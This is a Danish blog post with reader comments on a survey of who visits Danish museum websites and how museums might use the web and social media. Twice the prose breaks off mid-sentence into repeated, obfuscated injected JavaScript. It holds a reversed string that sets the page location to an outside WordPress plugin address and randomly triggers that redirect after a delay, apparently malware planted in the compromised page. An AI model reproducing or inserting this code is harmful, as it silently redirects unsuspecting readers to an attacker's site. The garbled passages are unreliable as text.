På Kulturarvsstyrelsens website kan man nu hente netbrugerundersøgelsen på http://www.kulturarv.dk/presse-nyt/nyhed/artikel/museernes-hjemmesider-til-eftersyn/
KUAS viser bl.a., at at de besøgende på museernes hjemmesider er ældre og bedre uddannede end gennemsnittet af den danske befolkning. De har desuden en tendens til at have bopæl i hovedstadsområdet, og det påpeges, at der “næsten ikke er nogen, der bruger museernes hjemmesider, som ikke også kommer på det fysiske museum“. Derfor er det måske heller ikke så overraskende, at disse brugere har et besøgsrelateret fokus, og er dét, som styrelsen kalder “konservative” i deres brug af et museums website.
KUAS konklusioner i forhold til et udviklingspotentiale er bl.a., at “Museerne skal fokusere på at udvikle reelt indhold til deres hjemmesider “ men også at “Museet er summen af de platforme, hvor museet er til stede” og at “Borgere skal møde museet på både analoge og digitale platforme“.
Forskellige platforme kunne være sociale medier, men også websites. For hvad er en “museumshjemmeside” i grunden? Er det en hjemmeside, der handler om et museum – eller er det også en hjemmeside, der handler om et emne …og som tilfældigvis er lavet af et museum?
I relation til den sidste konklusion eller anbefaling hæfter styrelsen sig bl.a. ved, at “Relativt mange, som hverken bruger museer eller museernes hjemmesider, er hyppige brugere af sociale medier som Facebook og Twitter. Museerne har derfor en oplagt mulighed for at engagere netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top denne gruppe ved at være til stede de rigtige steder. Her er det særligt vigtigt at holde fast i, at relationen til brugerne skal fokusere på vidensudveksling og dialog om de emner, museet beskæftiger sig med, og ikke museet som sådan.”
Så et af KUAS´bud er, “at museernes web-strategier går ud på at forny sig uden samtidig at skræmme faste brugere væk”. Det lyder jo lidt som at blæse og samtidigt at beholde melet i munden. Men det er måske ikke så umuligt som man skulle tro, hvis strategien netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top omfatter udvikling af flere forskellige stemmer – og dermed munde – på de forskellige platforme? Hvad får I andre ud af undersøgelsen?
Mit umiddelbare indtryk er, at resultaterne svarer overens med mine egne formodninger. Især bed jeg mærke i afsnittet om overskuelighed og enkelhed på museernes hjemmesider. Det afsnit giver nogle gode praktiske anvisninger. Desuden åbner undersøgelsen op for nogle spørgsmål. Kan der mon ligge manglende forventninger til grund for et moderat forbrug af hjemmesiderne? Hvis en bruger ikke forventer at blive klogere, så er der vel heller ingen grund til at opsøge hjemmesiden? Og, kan det tænkes, at vi som brugere ikke altid ved, hvad det er vi vil have, før vi har det?
Meget enig i dine synspunkter omkring forventninger. Hvis man ikke er vant til at kunne finde indhold om kunst/kulturhistorie, så er forventningerne til det måske heller ikke så store.
Det med enkelhed etc. er også interessant, for det synes jeg at have hørt i rigtigt mange andre, lignende sammenhænge. Og jeg tror, at de fleste af os ville svare det samme. Jeg ville i hvertfald, og jeg ville nok mene, at enkelhed var, at netop de elementer, jeg søgte, fremstod meget tydeligt :-).
Men det bliver interessant, når man så sammenholder ønsket om overskuelighed, enhelhed, flot grafisk profil etc. med listen over de websites, som brugere verden over rent faktisk er så glade for, at de anvender dem mest ( fx alexa topsites på http://www.alexa.com/topsites ). Uden at fornærme nogen alt for meget, kan man måske godt sætte et lille spørgsmålstegn ved, om styrken ved fx Facebook, YouTube, Wikipedia og Yahoo er, at de karakteriseres af enkelhed og pæn grafik.
Jeg har spekuleret rigtig meget over dette paradoks. Er en del af løsningen at tænke mere i landingpages, der ikke kun i indhold og SEO, men måske også i vægtningen enkelthed/indhold/funtionalitet er “versionerede”?
Det er forkert, at vi skal til at have fokusgruppe interviews til at styre museerne, som det foreslås. Museerne er ikke vaskepulver. Det er for DJØF-agtigt. Vi er bevidste museumsfolk, og det er os, som skal køre med klatten.
Museerne skal til at være bedre til at bruge nettet, ja. Men puljerne til formidling bør vi selv styre.
Det vil også sikre, at der kommer mere fokus på museernes kernekompetencer: genstande og viden. Det er det, som vi skal være gode til at levere, og så kan hele landets gode formidlere bruge vores guld til at formidle via TV, radio, aviser, skolebøger, spil – og web.
Vi skal være gode til det centrale, men rapporter som denne risikerer at flytte vores fokus væk. De danske museer skal f.eks. kunne levere en database på nettet over alle vores genstande og alle vores videnskabelige undersøgelser. Det vil kunne bruges i undervisningen, til forskning, til nysgerrige – og til os selv i vores arbejde med indsamling og formidling.
Men hvor er vi? “Museernes samlinger” er frygtelig. Rodet, usystematisk – og størstedelen af landets genstande mangler, herunder Nationalmuseets. Det samme kan siges om vores videnskabelige undersøgelser; de samler støv i skrivebordsskufferne.
Morale: lad os flytte ressourcerne fra KUAS og til museerne.
Er også meget enig i det med forventningerne – hvis vi ikke kender alternativerne, ved vi heller ikke, at vi måske mangler dem.
– Jeg synes det er påfaldende og tankevækkende, at de fleste udenlandske museumshjemmesider i langt højere grad er interaktive og brugerinddragende end de danske. Derfor havde det været interessant, hvis brugerundersøgelsen havde haft et perspektiv fra udlandet, så undersøgelsens brugere kunne se, hvordan museumssider også kan se ud.
Vi er blevet vant til, at hjemmesider skal have en mere eller mindre standardiseret opbygning for at virke overskuelige, og hurra for det, men jeg håber virkelig også snart at indholdsniveauet vil blive en “standardiseret” del af museumssiderne, så os der har lyst (og dem som endnu ikke ved de har lyst) kan deltage, bidrage og interagere med museerne og samlingerne.
Så jeg håber ikke rapporten bliver en “hvilepude” fordi mange brugere endnu har et konservativt forhold til sociale medier osv i museumssammenhæng.